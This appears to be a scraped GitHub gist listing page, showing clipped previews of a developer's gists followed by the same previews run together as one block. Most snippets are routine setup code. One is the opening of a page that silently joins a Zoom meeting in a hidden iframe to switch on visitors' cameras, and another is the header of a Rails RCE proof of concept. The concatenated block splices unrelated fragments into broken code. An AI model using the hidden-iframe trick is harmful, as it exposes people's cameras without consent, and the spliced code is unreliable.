Steve Schwartz JangoSteve

## zoom_exploit.html
<body>
  <h1>Totally not a phishing site to enable your camera and possibly microphone</h1>
  <script>
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "https://zoom.us/j/492468757";
    document.body.appendChild(iframe);

    setTimeout( function() {
      iframe.parentNode.removeChild(iframe);

## uninstall_extension.js
const {Cu} = require("chrome");
Cu.import("resource://gre/modules/AddonManager.jsm");

AddonManager.getAllAddons(function(aAddons) {
  // Here aAddons is an array of Addon objects
  var len = aAddons.length;
  console.log("Addons!");
  for (var i = 0; i < len; i++) {
    var addon = aAddons[i];
    console.log(addon.id, addon.name, addon.version, addon.isActive, addon.userDisabled);

## abstract.js
// Steve (server)
var WebSocketServer = require('ws').Server
  , wss = new WebSocketServer({port: 8080});
wss.on('connection', function(ws) {
    ws.on('message', function(message) {
        ws.send("Sure thing, how's this?");
    });
});

// Brian (browser)

## rails_omakase.rb
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0333)
#
# ## Advisory
#
#   https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
#
# ## Caveats
#

## setup_load_paths.rb
if ENV['MY_RUBY_HOME'] && ENV['MY_RUBY_HOME'].include?('rvm')
  begin
    rvm_path     = File.dirname(File.dirname(ENV['MY_RUBY_HOME']))
    if ENV['RAILS_ENV'] == 'production'
      rvm_lib_path = "/usr/local/rvm/lib"
    else
      rvm_lib_path = File.join(rvm_path, 'lib')
    end
    $LOAD_PATH.unshift rvm_lib_path
    require 'rvm'

## controller.js
app.get('/', function(req, res) {
  // [clipped] set user
  res.render('index', {user: user});
});

## gist:2294823
desc "Install the latest stable release of MySql."
task :install, roles: :db, only: {primary: true} do
  #run "echo #{mysql_password}"
  run "#{sudo} apt-get -y update"
  run "#{sudo} apt-get -y install mysql-server" do |channel, stream, data|
    # prompts for mysql root password (when blue screen appears)
    channel.send_data("#{mysql_root_password}\n\r") if data =~ /password/
  end
  run "#{sudo} apt-get -y install mysql-client libmysqlclient-dev"
end

## mysql_install.rb
namespace :slicehost do

  # The following will install mysql with default user/pw.
  # Be sure to setup proper user/pw via mysql.
  desc "Install MySQL"
  task :install_mysql, :roles => :app do
    apt_quiet_install('mysql-server libmysql-ruby')
    #sudo "apt-get install mysql-server libmysql-ruby -y"
  end

## redmine_trunk_on_heroku.md

      
              1 file
            
          
              3 forks
            
          
              1 comment
            
          
              2 stars
            
          
                JangoSteve
                / redmine_trunk_on_heroku.md
            
            
              Created
              March 1, 2012 21:39
            
              
                Importing Redmine to Git, Deploying to Heroku
              
          
    Import Redmine from SVN Trunk (latest and greatest) to Git, Deploy to Heroku

Adapted (but very updated) from:
http://blog.firsthand.ca/2010/10/installing-redmine-on-heroku-with-s3.html
http://blazingcloud.net/2010/06/18/deploying-a-redmine-wiki-to-heroku/

Import the latest trunk from svn to git (since we're not concerned with all the branches and tags, we don't need to use svn2git tool)


## session_secret.rb
require 'active_support/secure_random'
random_string = ActiveSupport::SecureRandom.hex(30)
puts random_string
	<body>
	<h1>Totally not a phishing site to enable your camera and possibly microphone</h1>
	<script>
	var iframe = document.createElement('iframe');
	iframe.style.display = "none";
	iframe.src = "https://zoom.us/j/492468757";
	document.body.appendChild(iframe);

	setTimeout( function() {
	iframe.parentNode.removeChild(iframe);
	const {Cu} = require("chrome");
	Cu.import("resource://gre/modules/AddonManager.jsm");

	AddonManager.getAllAddons(function(aAddons) {
	// Here aAddons is an array of Addon objects
	var len = aAddons.length;
	console.log("Addons!");
	for (var i = 0; i < len; i++) {
	var addon = aAddons[i];
	console.log(addon.id, addon.name, addon.version, addon.isActive, addon.userDisabled);
	// Steve (server)
	var WebSocketServer = require('ws').Server
	, wss = new WebSocketServer({port: 8080});
	wss.on('connection', function(ws) {
	ws.on('message', function(message) {
	ws.send("Sure thing, how's this?");
	});
	});

	// Brian (browser)
	#!/usr/bin/env ruby
	#
	# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0333)
	#
	# ## Advisory
	#
	# https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
	#
	# ## Caveats
	#
	if ENV['MY_RUBY_HOME'] && ENV['MY_RUBY_HOME'].include?('rvm')
	begin
	rvm_path = File.dirname(File.dirname(ENV['MY_RUBY_HOME']))
	if ENV['RAILS_ENV'] == 'production'
	rvm_lib_path = "/usr/local/rvm/lib"
	else
	rvm_lib_path = File.join(rvm_path, 'lib')
	end
	$LOAD_PATH.unshift rvm_lib_path
	require 'rvm'
	app.get('/', function(req, res) {
	// [clipped] set user
	res.render('index', {user: user});
	});
	desc "Install the latest stable release of MySql."
	task :install, roles: :db, only: {primary: true} do
	#run "echo #{mysql_password}"
	run "#{sudo} apt-get -y update"
	run "#{sudo} apt-get -y install mysql-server" do \|channel, stream, data\|
	# prompts for mysql root password (when blue screen appears)
	channel.send_data("#{mysql_root_password}\n\r") if data =~ /password/
	end
	run "#{sudo} apt-get -y install mysql-client libmysqlclient-dev"
	end
	namespace :slicehost do

	# The following will install mysql with default user/pw.
	# Be sure to setup proper user/pw via mysql.
	desc "Install MySQL"
	task :install_mysql, :roles => :app do
	apt_quiet_install('mysql-server libmysql-ruby')
	#sudo "apt-get install mysql-server libmysql-ruby -y"
	end
	require 'active_support/secure_random'
	random_string = ActiveSupport::SecureRandom.hex(30)
	puts random_string